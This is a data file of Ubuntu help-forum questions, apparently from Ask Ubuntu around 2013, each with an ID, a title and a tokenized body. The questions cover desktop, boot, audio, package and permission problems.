293526	hide and unhide folders	is there any way to unhide folders other than removing the `` . '' in fornt of it . becasue i have minecraft and the folder which you install mods to is called `` .minecraft '' and its in /home/usr but i want to unhide it but the name of it has to be `` .minecraft '' ( its called that on all os ) is there any way to unhide it but keep the name of `` .minecraft '' ? thanks for your help
293531	what is tcp6 773/cupsd ? why is it listening and why the ip is not cleared ?	hello everybody , testing my open ports i ran command sudo netstat -ntlup with a normal looking output on my ubuntu 12.04 desktop . active internet connections ( only servers ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 127.0.0.1:7634 0.0.0.0 : * listen 1919/hddtemp tcp 0 0 127.0.0.1:53 0.0.0.0 : * listen 9393/dnsmasq tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen 773/cupsd tcp6 0 0 : :1:631 : : : * listen 773/cupsd udp 0 0 127.0.0.1:53 0.0.0.0 : * 9393/dnsmasq but i ca n't see the port tcp6 773 is listening at i.e . tcp6 0 0 : :1:631 : : : * listen 773/cupsd what is this ?
293532	why is the unity launcher pixelated after suspend on ubuntu 13.04 ?	having a lot of issues with suspend on ubuntu 13.04 . ca n't wake up after suspending when using nouveau driver ( nvidia quadro fx370 ) . when using every single proprietary driver on the list , the unity launcher looks pixelated ( see picture ) .
293538	how to sort by type and then by modified in nautilus ?	how to automatically sort by type and then by modified in file manager ? using 13.04 and gnome 3.8
293539	`` safe ( ly ) remove function/button '' shows up for usb external hard drive but not usb flash drive [ ubuntu 13.04 ]	i have to use udisks -- unmount /dev/sdb1 & & udisks -- detach /dev/sdb to remove usb flash drive while i can use safe ( ly ) remove function/button for usb external hard drive . how can i made that function/button available for usb flash drive ? ps : please do not direct me to launchpad , it is very technical .
293543	toggle transparency	i am using 13.04 and am missing the toggle transparency feature which was available through the compiz settings manager in the accessibility section under 'opacity , brightness and saturation ' . it allowed to change the transparency of a window by e.g . pressing the alt key and using the mouse scroll wheel . this was very useful for e.g . comparing two different plots by putting their windows over each other and then changing the transparency . is this feature still hidden somewhere ?
293546	how to launch google-chrome with custom parameters by default ?	i want to launch chrome and chromium from the unity launcher with the -- purge-memory-button option . for chromium i was able to add the above parameter to /etc/chromium-browser/default but that 's not an option for google-chrome . how do i do it for google-chrome ? would an alias in my .bash_profile work ?
293548	can not update .iceauthority , do not have permission to remove/change , can not resolve host !	i 've seen this question asked many times before , and tried every single solution i found , yet none of them solved this problem . all my programming/computing knowledge comes from copying the solutions i see , so i do not know how or what i specifics i should be posting . i installed ubuntu on my laptop , and could not figure out how to change my password , someone else changed it for me and since then i 've always had the .iceauthority eorr , which i just skipped since it did not interfere with my work on the laptop . when it started to behave strangely i decided to update my version of ubuntu . i updated from version 10 to version 12 , and since then the .iceauthority error will not let me log in . there is only one user on this computer , i can not remove .iceauthority for i have no permission . i can not chmod or sudo anything because it `` can not resolve host '' it asks for a password after that error and nothing happens . there have been solutions that did not give error messages , and instead refused to return to the log-in screen if i tried ctr alt f7 . right after the update it would not give an error and just did not log me in . using a solution i got a different log-on screen , but the ice error will not log me in . if this is unsolvable , is there a way to retract files from this computer ? i have tons of important .doc files stored in this laptop . thanks for the help in advance !
293554	moving folder to trash	how can i give myself permission to delete a folder from `` file system/opt '' ? folder owner is root . i am the only user of this computer but i did not install the os . i am not much of a tech person but can follow instructions .
293557	ca n't login to ubuntu 12.04 [ also ctrl+ alt+f2 not working ] , keeps rebouncing to same login page	when i try to login to my account i can not login . it keeps re-bouncing to the same login page and it does n't show wrong password . i when i type a wrong password it does show `` wrong password '' . so i checked the problem in this site found an answer : ca n't log in to ubuntu 12.04 . as the answer says i tried ctrl+alt+f2 , it does n't work and there is n't any response . i tried out ctrl+alt+__ and all possible yet no change . the ubuntu that i use is a fresh install and not any upgrades . i logged into guest account and tried out ctrl+alt+f1 and there is n't any response . can someone help me ?
293560	mapped keys do not work in some applications	i have an apple keyboard where the right command key ( super_r ) is mapped to the right alt key ( iso_level3_shift ) with xmodmap : $ cat ~/.xmodmap clear mod4 keysym super_r = iso_level3_shift in some applications though , like firefox and thunderbird , the right command and alt keys are disabled altogether . is my .xmodmap invalid ? i have also tried redefining keycodes in section xkb_keycodes of a dump from xkbcomp and then loading the keymap with xkbcomp but still no luck with firefox and thunderbird . any clues ?
293566	open terminal from nautilus by right click	i use nautilus as my default file manager . is there any way that i can customize it so that right click anywhere in the window gives an option to open the current directory in terminal . i have seen same feature in dolphin , wish i could do the same in nautilus too .
293571	calendar in unknown language	just installed ubuntu 13.04 . my system language is english ( uk ) and everything appears in english . but for some weird reason , the calendar appears in some south east asian language with latin script ( my best guess , vietnamese or indonesian ) . please help me . additionally , in most of the pages , the firefox says that it does n't have the necessary plugins installed to display all the media . whenever i tell it to search for suitable plugin , it keeps searching for hours . how long should i wait here before the search completes ?
293574	who is `` user 109 '' ?	i found out that user 109 launches pulseaudio on startup , which blocks mine : petr @ sova : ~ $ ps -ef | grep pulseaudio 109 1515 1 1 15:23 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog petr 2344 1 0 15:24 ? 00:00:00 /usr/bin/pulseaudio -- start -- log-target=syslog petr 2807 2757 0 15:24 pts/1 00:00:00 grep -- color=auto pulseaudio because of that , i ca n't access the sound card and get dummy outputs only . once i kill the 109 's process , everything works fine . who is user 109 and how do i prevent him from launching pulseaudio ? my suspicion is that it 's somehow connected to lightdm . edit : petr @ sova : ~ $ cat /etc/passwd | grep 109 speech-dispatcher : x:109:29 : speech dispatcher , , , :/var/run/speech-dispatcher : /bin/sh
293575	switch desktop without sign out	i have multiple desktop environments installed , like kubuntu-desktop , lubuntu-desktop . also i need to switch between these desktops frequently . so is there any possible way that i do n't need to log out and log back in to switch my desktop from gnome to kubuntu ?
293576	problem with eclipse after installing ubuntu 12.04 lts ( detailed description )	system specs and code sample in the end of this contribution ! first of all , i am new to this forum . please tell me if there is anything wrong with the layout or the question itself . i am also new to linux , ubuntu and kind of a newbie at java . i was using windows 7 before ubuntu . the problem appeared first after installing ubuntu on my machine . problem when running animation windows in eclipse , using the swing package or java applet - the animation is jumpy and not smooth . i will show you a sample from my code of a very simple program that consists of a jpanel and a jframe with a background and a 2d-ball moving from left to right . the program is set to repaint every 30 ms . it should n't be a problem to run simple graphics like this . eclipse is fast and smooth otherwise . would appreciate any help or advice , if someone has encountered something like this before ! what i tried *searching for bugs or problems related to this , but not finding any *installing the latest versions of eclipse and the latest jdk *editing my eclipse.ini file *running my code on my windows 7 machine ( works fine ) *installing bumblebee and using nvidia optimus system os : ubuntu 12.04 ( precise ) 64-bit memory : 5.6 gib , processor intel core 2.5 ghz x 4 cpu eclipse juno 4.2.0 java version brings me $ -java version java version `` 1.7.0_21 '' java ( tm ) se runtime environment ( build 1.7.0_21-b11 ) java hotspot ( tm ) 64-bit server vm ( build 23.21-b01 , mixed mode ) my eclipse.ini file -startup plugins/org.eclipse.equinox.launcher_1.3.0.v20120522-1813.jar -- launcher.library plugins/org.eclipse.equinox.launcher.gtk.linux.x86_64_1.1.200.v20120913-144807 -product org.eclipse.epp.package.jee.product -- launcher.defaultaction openfile -showsplash org.eclipse.platform -- launcher.xxmaxpermsize 256m -- launcher.defaultaction openfile -vmargs -xincgc -xx : newsize=8m -xx : maxpermheapexpansion=10m -xx : cmsinitiatingoccupancyfraction=70 -xx : +usecmsinitiatingoccupancyonly -xx : +useparnewgc -xx : +cmsconcurrentmtenabled -xx : concgcthreads=2 -xx : parallelgcthreads=2 -xx : cmsincrementaldutycyclemin=0 -xx : cmsincrementaldutycycle=5 -xx : gctimeratio=49 -xx : maxgcpausemillis=20 -xx : gcpauseintervalmillis=1000 -xx : +usecmscompactatfullcollection -xx : +cmsclassunloadingenabled -xx : +doescapeanalysis -xx : +usecompressedoops -xx : +aggressiveopts -xx : +explicitgcinvokesconcurrentandunloadsclasses -dosgi.requiredjavaversion=1.7 -dhelp.lucene.tokenizer=standard -xx : maxpermsize=128m -xx : permsize=128m -xmn128m -xms1024m -xmx1024m -xss2m -xx : +useconcmarksweepgc code sample /////////sample from the jpanel class ///////// private int y = 200 ; private int x = 0 ; public testpanel ( ) { setvisible ( true ) ; setpreferredsize ( new dimension ( 1500,400 ) ) ; setbackground ( color.black ) ; } public void move ( ) { x = x+2 ; } public void paintcomponent ( graphics g ) { super.paintcomponent ( g ) ; g.setcolor ( color.green ) ; g.filloval ( x , y,50,50 ) ; } } ///////sample from the jframe class ///////// private testpanel thepanel = new testpanel ( ) ; private timer t = new timer ( 30 , this ) ; public testframe ( ) { add ( thepanel ) ; setvisible ( true ) ; setdefaultcloseoperation ( exit_on_close ) ; pack ( ) ; t.start ( ) ; } public void actionperformed ( actionevent e ) { thepanel.move ( ) ; repaint ( ) ; } edit : adding an exception : when i hover with my mouse ( and keep moving it ) over the application window the animation stops beeing jumpy . when i stop moving , it starts beeing not smooth and jumpy again . anyone heard of this ?
293578	why does cpu usage spikes to 90 % and more after wake from suspend on ubuntu 13.04 ?	on an acer c7 chromebook running chrubunutu ( not crouton ) i noticed a problem after moving to 13.04 . if i put the system to sleep and then wake it up both cpu cores spike to 90 % + usage . soon after the fans will kick on full speed and the system will slowly start to cook . however none of the processes seem to be responsible according to the system monitor . if i reboot the machine or shut it down the usage drops back down to the expected levels . i did not see this issue with 12.04 , i did not use 12.10 long enough to notice if it was happening . system specs : memory : 7.7 gib ( 8gb ) cpu : intel celeron cpu 847 graphics : intel sandybridge mobile os type : 64-bit disk : 278.9 gb update ( 2013/5/15 ) : /u/ryeguy on reddit pointed me to a link concerning acpid : http : //www.cisgendered.com/ ? p=9 seems this issue is a little more specific to closing the lid and not sleep in general . still i 'd like to draw more attention to the issue in hopes of discovering a root cause and working towards a solution .
293586	i want to open a file in the root directory in my c++ application in write mode .	i have a file in the root directory which i want to open for editing in my qt application . generally we use `` sudo ( editor ) filepath '' to open the file with roots permissions . but i want to achieve this in my c++ qt application . any kind of help is appreciable . thank you .
293588	distrowatch lists ubuntu 3rd popular ?	is this even possible that linux is leading with a sizeable margin , followed by magnaelia , and then comes ubuntu . are tehse statistics trustworthy ? is there any specific place where we can get the actual popularity rankings ?
293591	why does file owner and group keep changing to root ?	i am running an install of cakephp on ubuntu 12.04 lts . the way certain files are accessed i need permissions set a certain way within my install of ubuntu . nothing out of the ordinary . the problem is that the ownership and group of certain files keeps reverting back to root after i manually change them to www-data for the owner and group . for example , i have the following file : -rw-rw-r -- 1 www-data www-data 155 may 10 09:26 myapp_cake_model_default_cake_apps_1_list after a while , it will change to : -rw-rw-r -- 1 root root 155 may 10 10:13 myapp_cake_model_default_cake_apps_1_list this is happening in a couple of locations . /var/app/tmp/cache and /var/app/tmp/cache/models/ . i 'm not sure if this is happening because of a cron or ubuntu does n't like the permissions or because i 'm a moron and idiot . but it 's driving me crazy . thanks !
293594	diablo 3 under wine is safe ?	i heard a lot about blizzard banning a lot people who used wine to run diablo 3 on linux . after that i also heard that they actually were cheaters - and that 's the only reason of ban . can someone tells me if playing d3 on linux is safe ? game is quite expensive ... thanks !
293598	how to restore ubuntu ?	i used to dual boot ubuntu 12.04 and windows xp . i have now deleted xp as i was not using it . but now the boot loader is n't working correctly . how do i repair it ?
293604	pulseaudio works at 100 percent at all time	my headphones started to rattle recently . then i opened pulse audio volume control i noticed that blue line indicating loudness of sound is always stuck at highest and it does n't matter how much i will lower sound , it stay at highest point . it is the same with build in realtek sound card and with creative sound card and if i enable or disable pulse equalizer . i 'm on ubuntu 12.04
293612	dual-boot ubuntu 13.04 and windows 8 : windows does n't boot	i have installed ubuntu with dual boot to a preinstalled windows 8 on a lenovo e-135 . i disabled fast start in windows 8 before installation and shrank the partition to give place for ubuntu . all went well and the installer went on very smoothly . after restart ubuntu booted perfectly ... .. and then i tried to restart to boot into windows 8 but no entries suggestion any windows partition . i restarted into ubuntu and ran boot repair . all went well and after the next reboot a lot of entries were present suggesting some could be the windows entry.. but nothing allowed windows 8 to start . some options reported that they were forbidden for secure-boot and others reported that a file was missing . i looked at the boot repair report but i can not understand what it tells me . so what shall i do to make windows 8 start also ? ? here is the paste file first part boot info script e7fc706 + boot-repair extra info [ boot-info 31jan2013 ] ============================= boot info summary : =============================== = > no boot loader is installed in the mbr of /dev/sda . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows 8/2012 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda2 : __________________________________________________________________________ file system : vfat boot sector type : windows 8/2012 : fat32 boot sector info : no errors found in the boot parameter block . operating system : boot files : /efi/boot/bkpbootx64.efi /efi/boot/bootx64.efi /efi/ubuntu/grubx64.efi /efi/ubuntu/shimx64.efi /efi/lenovo/boot/bootmgfw.efi /efi/lenovo/boot/bootmgr.efi /efi/lenovo/boot/memtest.efi /efi/microsoft/boot/bkpbootmgfw.efi /efi/microsoft/boot/bootmgfw.efi /efi/microsoft/boot/bootmgr.efi /efi/microsoft/boot/bootx64.efi /efi/microsoft/boot/memtest.efi sda3 : __________________________________________________________________________ file system : boot sector type : - boot sector info : mounting failed : mount : unknown filesystem type '' sda4 : __________________________________________________________________________ file system : ntfs boot sector type : windows 8/2012 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 8 boot files : /bootmgr /boot/bcd /windows/system32/winload.exe sda5 : __________________________________________________________________________ file system : ntfs boot sector type : windows 8/2012 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : sda6 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 13.04 boot files : /boot/grub/grub.cfg /etc/fstab sda7 : __________________________________________________________________________ file system : swap boot sector type : - boot sector info : ============================ drive/partition info : ============================= drive : sda _____________________________________________________________________ disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes partition boot start sector end sector # of sectors id system /dev/sda1 1 976,773,167 976,773,167 ee gpt guid partition table detected . partition start sector end sector # of sectors system /dev/sda1 2,048 2,050,047 2,048,000 windows recovery environment ( windows ) /dev/sda2 2,050,048 2,582,527 532,480 efi system partition /dev/sda3 2,582,528 2,844,671 262,144 microsoft reserved partition ( windows ) /dev/sda4 2,844,672 475,482,111 472,637,440 data partition ( windows/linux ) /dev/sda5 944,373,760 976,773,119 32,399,360 windows recovery environment ( windows ) /dev/sda6 475,482,112 936,921,087 461,438,976 data partition ( windows/linux ) /dev/sda7 936,921,088 944,373,759 7,452,672 swap partition ( linux ) '' blkid '' output : ________________________________________________________________ device uuid type label /dev/sda1 66d6ecc9d6ec9a97 ntfs winre_drv /dev/sda2 6af0-0738 vfat system_drv /dev/sda4 c436f52136f51560 ntfs windows8_os /dev/sda5 f238e5d638e599bd ntfs lenovo_recovery /dev/sda6 7686bd41-5732-4917-9853-604e7ef61127 ext4 /dev/sda7 2d8b17e7-d16c-4361-98bb-7445edccf581 swap ================================ mount points : ================================= device mount_point type options /dev/sda6 / ext4 ( rw , errors=remount-ro )
293613	system monitor > system tab missing in ubuntu 13.04	i upgraded to ubuntu 13.04 in april , but just today i observed that system tab is missing from system monitor . i searched on internet and i did n't find too much about this fact . did they removed it or does my system have a problem ? if they removed it , why ?
293614	cloud foundry in ubuntu openstack	i have my final year project title e-waste management system using cloud foundry . the task is to : - 1 ) install and deploy cloud foundry in ubuntu openstack 2 ) design , develop and run e-waste management system 3 ) evaluate the application in term of performance and capacity . i do n't how to install and deploy cloud foundry on ubuntu openstack . is there any method or example to follow up . thanks in advanced .
293618	ethernet port on thinkpad does n't connect but the one on the ultrabase ( dock ) does	i just recently bought a used thinkpad x200s and installed xubuntu 13.04 on it . i am have issues getting the ethernet port on the laptop to connect . i also have a ultrabase dock for the laptop . while docked , the ethernet port on the ultrabase connects perfectly . whether the laptop is docked or not the its own ethernet port wo n't connect . however , the ethernet port on the laptop does light up when a cable is plugged into it when it is n't docked . it does n't light up at all when it 's docked . my current theory is that because i installed xubuntu with the laptop docked and the ethernet plugged into the dock this caused port on the laptop to not be setup . from looking at my network settings in xfce it seems that only eth0 is setup and that is the port on the base . whether the device is docked or not that is the only interface that shows up and when using the dock 's port it is connected . does this mean that the port on the laptop is completely broken or is it a software problem ?
293619	assign higher priority to ppa	i 'm trying to figure out how to assign higher priority to one ppa over another ppa . i had a look on bunch of the answers on this forum but none of them solves my problem . we have two ppa sources on some of our servers which we stick into separate files in /etc/apt/sources.list.d . some of these repos provide same packages ( in terms of names ) but different versions and possibly different binaries . is there a way how we can prioritise one repo over another ? i read apt_preferences tutorial but it could not be more obscure and did n't find the answers for my question . here is the situation . we have the following sources : $ ls -l /etc/apt/sources.list.d total 12 -rw-r -- r -- 1 root root 66 jan 2 16:50 nginx-source.list -rw-r -- r -- 1 root root 84 jan 2 16:49 ruby-ng-experimental-source.list where nginx-source.list content is : deb http : //ppa.launchpad.net/nginx/stable/ubuntu precise main and ruby-ng-experimental-source.list content is : deb http : //ppa.launchpad.net/brightbox/ruby-ng-experimental/ubuntu precise main both of these sources provide nginx-full package of different versions etc . when i list the priorities ruby-ng-experimental-source.list is on top of output hence nginx-full is installed from that repo : $ apt-cache policy nginx-full nginx-full : installed : 1:1.2.3-1~38~precise1 candidate : 1:1.2.6-1~43~precise1 version table : 1:1.2.6-1~43~precise1 0 500 http : //ppa.launchpad.net/brightbox/ruby-ng-experimental/ubuntu/ precise/main amd64 packages *** 1:1.2.3-1~38~precise1 0 100 /var/lib/dpkg/status 1.4.1-1ppa0~precise 0 500 http : //ppa.launchpad.net/nginx/stable/ubuntu/ precise/main amd64 packages 1.1.19-1ubuntu0.1 0 500 http : //mirror.rackspace.co.uk/ubuntu/ precise-updates/universe amd64 packages 1.1.19-1 0 500 http : //mirror.rackspace.co.uk/ubuntu/ precise/universe amd64 packages how do i prioritize repo listed in nginx-source.list over the one which is on top of the list now ? i tried something like this : $ cat /etc/apt/preferences package : nginx-full pin : origin http : //ppa.launchpad.net/nginx/stable/ubuntu pin-priority : 1000 package : nginx-full pin : origin http : //ppa.launchpad.net/brightbox/ruby-ng-experimental/ubuntu pin-priority : 100 but that has changed priorities of both sources to the same number - or something like that ? so this has not changed the priorities and nginx-full is still being installed form the brightbox ppa $ apt-cache policy nginx-full nginx-full : installed : 1:1.2.3-1~38~precise1 candidate : 1:1.2.6-1~43~precise1 package pin : ( not found ) version table : 1:1.2.6-1~43~precise1 1000 500 http : //ppa.launchpad.net/brightbox/ruby-ng-experimental/ubuntu/ precise/main amd64 packages *** 1:1.2.3-1~38~precise1 1000 100 /var/lib/dpkg/status 1.4.1-1ppa0~precise 1000 500 http : //ppa.launchpad.net/nginx/stable/ubuntu/ precise/main amd64 packages 1.1.19-1ubuntu0.1 1000 500 http : //mirror.rackspace.co.uk/ubuntu/ precise-updates/universe amd64 packages 1.1.19-1 1000 500 http : //mirror.rackspace.co.uk/ubuntu/ precise/universe amd64 packages anyone has any idea how to achieve what i 'm trying to do ?
293622	apt-get update problem when updating a reprepro repository	i have made a repository using reprepro on my ubuntu 13.04 , i uploaded this repo to sourceforge.net , i can download packages from it and i can update it , put after adding the repository to my software sources and running a sudo apt-get update this error is appeard in terminal : w : size of file /var/lib/apt/lists/partial/sourceforge.net_projects_helal_files_repository_dists_the % 5fold % 5fmoon_release.gpg is not what the server reported 0 353 w : size of file /var/lib/apt/lists/partial/sourceforge.net_projects_helal_files_repository_dists_the % 5fold % 5fmoon_release is not what the server reported 0 161 w : size of file /var/lib/apt/lists/partial/sourceforge.net_projects_helal_files_repository_dists_the % 5fold % 5fmoon_main_binary-i386_packages is not what the server reported 0 387 as i said , i can download and upload packages even that , but this message is very noisy , i know that there is a way to ignore those message from apt-get but i need a solution for a user that runs sudo apt-get update only with no other tweaks for his own apt-get . is there a fix for that ? thanks .
293624	how to install kubuntu on windows 8 for a	i 've read web-e answers to a dual boot for windows 8 and kubuntu . my problem arises in that the wubi application causes an error message to come up . i do have the option to start kubuntu or windows 8 at the start up screen . starting windows did n't succeed . the reason may be changing software . to solve this problem : insert installation disc of windows and reboot pc choose language settings and click next use repair if you do n't own this disk contact with the administrator . file : \ubuntu\winboot\wubildr.mbr state : 0xc000007b information : could not load application or operating system because of the lack of the required file or errors in this file other sites and youtube offers solutions but none seem to help . i 'm getting this same error message . i want to install kubuntu on an external hdd , which is under the uefi management . i do n't have a windows 8 installation disk since windows 8 came preinstalled . one ubuntu site indicated installing a kubuntu dual boot with windows 8 is n't possible at this time . your suggestions are greatly appreciated .
293625	need help studying for linux+ cert	a user ( bob ) accidentally makes a subdirectory ( bobsdir ) in their home directory and try to remove it but when they use the `` rmdir \bobsfile '' command they get `` no such directory '' . the answer to the question is : rmdir ~bob/\bobsdir i get the `` ~ '' that is the same as /home but i can not find in my study materials what the `` \ '' are and why they work in this instance . i am a person that needs to know the `` why '' about stuff so any help would be greatly appreciated .
293627	photo stream on ubuntu	well , i have an iphone 5 , this device ( actually , all apples devices ) can share pictures , documents and among other things by photo-stream or icloud . i would like to know if having ubuntu i can still use photo-stream , itunes or ic loud . i would appreciate your help . thanks a lot .
293629	ubuntu 13.04 nautilus tree view	please let me know is there a way to have a tree view in the nautilus in ubuntu 13.04 ? i remember that i had this feature in 12.10 version ? regards pk
293631	como reparar `` the sistem is running in low-graphics mode '' ?	acabo de instalar ubuntu pero al iniciarlo me da el error `` the sistema is running in low-graphics mode '' . por favor ayudenme
293632	sound problem on both speakers and headphones	i know there are a lot of questions like this here , but i tried them all and i could n't make them work . i have a hp dv6-2190ep laptop . my sound card is hda intel idt 92hd75b3x5 . my ubuntu is 13.04 . i tried to add options on alsa-base.conf but i still do n't have auto mute option . i 'm completely changing to ubuntu from windows and it is important to fix this . i 'm around this for about 1 month .
293636	how can i run a python script with out the prompt `` run in terminal , display , cancel , run ''	i added # ! /usr/bin/env python to the script and chmod +x in terminal , but on double clicking it still asks for these 4 options . i want it to automatically open in terminal . is it possible ? i 'm using ubuntu 12.10 .
293638	overheating laptop packardbell ls44hr on linux	i have tried ubuntu 12.10-13.04 , xubuntu and now installed lubuntu on my packardbell ls44-hr laptop . on every linux system my laptop is overheating too fast . i tried to install amd ati hd radeon 66xxm graphics by myself but it gives me this error on fglrx-install.log file . supported adapter detected . check if system has the tools required for installation . fglrx installation requires that the system has make tool . make can not be found on this system . fglrx installation requires that the system has gcc tool . gcc can not be found on this system . one or more tools required for installation can not be found on the system . install the required tools before installing the fglrx driver . optionally , run the installer with -- force option to install without the tools . forcing install will disable amd hardware acceleration and may make your system unstable . not recommended . i really want to use linux , i hate windows . please help me : ( and here is my system profiler and benchmark results . it 's even overheating when i am doing nothing on desktop . http : //needhelp.zohosites.com/ ( this one is the best way for showing results because the results is in html file so i uploaded it in a free domain )
293640	delivery to ontario , canada	i need delivery to toronto , on , canada . who do i email ? and how do i ask for it ? how will i know that they received my email ? please help ! i 've already ordered and made payment !
293646	convert dd image file to iso	i 've a disk dump image ( .dd ) of an old version of x-linux ( x-linux r41 ) . is there any chance to successfully convert this .dd image to a .iso ? i 've tried this conversion through a forensic tool , but what i 've got is a corrupted image , where no os is found . i need an iso because i 've to emulate this os through qemu .
293649	proxychains ld_preload can not be preloaded	using proxychains to do apt-get update in ubuntu 12.04.2 sudo proxychains apt-get update gives following error error : ld.so : object 'libproxychains.so.3 ' from ld_preload can not be preloaded : ignored . how can i avoid this error ?
293650	can i run ubuntu 12.04 ?	ok , so i just need a little advice . i own a fujitsu esprimo mobile v6535 machine with these specs : 4gb ram pentium ( r ) dual-core cpu t4300 @ 2.10ghz × 2 unknown graphics driver ( found somewhere on the net i have an intel gl40 chipset and mobile intel®gma 4500m graphics ) 500gb disk will it run smoothly according to these specs ? do you want to ubuntu12.04 as dual boot or you want to install after removing existing os if any .
293661	validator.nu installation with launch script	i have tried to use the following instructions atleast 5 times and i can not get it to run correctly . these are the instructions with some added notes . sudo apt-get install mercurial subversion default-jdk mkdir -p ~/build/validator-nu cd ~/build/validator-nu hg clone https : //bitbucket.org/validator/build build export java_home=/usr/lib/jvm/java-6-openjdk python build/build.py all python build/build.py all -- -- at this point everything works xxxxx -- info : :started socketconnector @ 0.0.0.0:8888 -- -- and i confirmed by killing the script and running python build/build.py run -- -- i also edited /etc/w3c/validator.conf : < external > html5 = http : //localhost:8888/ < /external > i tried the following to install the above system wide and to run at start up . any help would be greatly appreciated . sudo groupadd validator-nu sudo useradd -r -c `` validator.nu daemon '' -g validator-nu \ -d /usr/local/validator-nu -s /bin/false validator-nu sudo mv ~/build/validator-nu /usr/local/ sudo chown -r validator-nu : validator-nu /usr/local/validator-nu cat < < eof | sudo tee /usr/local/bin/validator-nu # ! /bin/sh cd /usr/local/validator-nu su -s '/bin/sh ' -c 'python build/build.py run > logs/validator-nu.log 2 > & 1 ' validator-nu eof sudo chmod +x /usr/local/bin/validator-nu edit /etc/rc.local and add the following line before exit 0 : /usr/local/bin/validator-nu i need some assistance getting the script installed correctly as a start up script . any help would be greatly appreciated .
293663	compressing big files into several files ubuntu	i am wondering if we on ubuntu have an option to compress an directory of for instance 2gb size into several files that are restricted to the size of say 100 mb ? i know on microsoft windows you can do this with some utilities such as winzip ( if i remember correctly ) . however if i do it on windows then file permissions/ownership are not kept , and when extracting in ubuntu at a later point ( several .z files ) it often becomes corrupt . i need to make the size of these files indented down to 100 mb or less due to upload restrictions ( i am making a program that needs to download some big files ) . it needs to be cli based ( or at least have a support for cli extraction ) . this is for support on ubuntu servers .
293670	getting error when trying to use dolphin instead of nautilus	i am getting the following error while trying to use dolphin instead of nautilus . `` failed to execute child process `` /usr/share/applications/kde4/dolphin.desktop '' ( permission denied ) '' i used the soultion of this to get dolphin as the default file manager . please guide me what next to do . ps : tried to change permissions as well and it did not work . using ubuntu 12.04
293672	how can i batch convert images to b/w while preserving the folder structure	i want to batch process images but i have a very specific task that i want to do i do not want to change image type i want to make them black and white i want it to create/preserve images and sub folder structure i did this in photoshop but it did not preserve folders and sub folder content it just threw every converted file in one directory . my only hope is linux : d thank you in advance ! you can see different discussion about this here but basharat sial worked for me http : //ubuntuforums.org/showthread.php ? t=2143992
293673	what command is being executed with the brightness control slider in system settings ?	i 've been finding a disappointing number of systems who 's function keys do not work to control brightness . that said , if i go into the brightness settings within system settings i find a slider . i can control the brightness there by sliding left to right , etc . i got to wondering , what command is this executing ? if the system is being stubborn about function keys i could always make a pair of bash scripts and tie them to a shortcut key . any insight ?
293674	tray icons in unity in 13.04	in ubuntu 13.04 there is no tray icon and whiteliting is removed . i installed gnome 3.8 but there is no tray there too ! ! how can i get tray icons back ( for applications that put icon in tray like vuze , truecrypt , ... & have no indicator ) in unity ? e.g . a wrapper app indicator that show old applications icons ? thanks
293676	how do i reenable `` open in new window '' option in ubuntu 13.04 ?	in ubuntu 13.04 , nautilus no longer has an open in new window option for folders , but only open in new tab . how can i reenable that option ?
293677	will i have to reformat my disk that is running ubuntu 13.04 64bit after upgrading my motherboard and cpu ? details inside	im currently running ubuntu 13.04 64 bit on a custom computer that consists of a asus a8n-sli deluxe mobo and a amd athlon 64 fx-60 dual core processor x 2 with 4 gb ram . the os works great and supports my gpu , sound card and everything else . i 'm upgrading my motherboard and cpu today to a gigabyte 990fxa-ud3 motherboard , a amd fx-8350 cpu with 16gb ram . everything else in the system will stay the same . questions : will i have to reformat my disk after installation ?
293680	xorg hangs machine after a period of inactivity	and this happens only when i leave the machine with x running . here is my xorg.conf , which is basically the failsafe one . section `` device '' identifier `` configured video device '' driver `` vesa '' endsection section `` monitor '' identifier `` configured monitor '' endsection section `` screen '' identifier `` default screen '' monitor `` configured monitor '' device `` configured video device '' endsection and here is the output of lspci : 00:00.0 host bridge : uli electronics inc. m1644/m1644t northbridge+trident ( rev 01 ) 00:01.0 pci bridge : uli electronics inc. pci to agp controller 00:04.0 ide interface : uli electronics inc. m5229 ide ( rev c3 ) 00:06.0 multimedia audio controller : uli electronics inc. m5451 pci ac-link controller audio device ( rev 01 ) 00:07.0 isa bridge : uli electronics inc. m1533/m1535/m1543 pci to isa bridge [ aladdin iv/v/v+ ] 00:08.0 bridge : uli electronics inc. m7101 power management controller [ pmu ] 00:0a.0 ethernet controller : intel corporation 82557/8/9/0/1 ethernet pro 100 ( rev 0d ) 00:0c.0 usb controller : nec corporation ohci usb controller ( rev 41 ) 00:0c.1 usb controller : nec corporation ohci usb controller ( rev 41 ) 00:0c.2 usb controller : nec corporation upd72010x usb 2.0 controller ( rev 02 ) 00:11.0 cardbus bridge : toshiba america info systems topic100 pci to cardbus bridge with zv support ( rev 32 ) 00:11.1 cardbus bridge : toshiba america info systems topic100 pci to cardbus bridge with zv support ( rev 32 ) 00:12.0 system peripheral : toshiba america info systems sd typa controller ( rev 03 ) 01:00.0 vga compatible controller : trident microsystems cyberblade xpai1 ( rev 82 ) 02:00.0 network controller : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller ( rev 02 ) my machine is a toshiba dynabook ss 2000 ds80p/2 . runs ubuntu 13.04 .
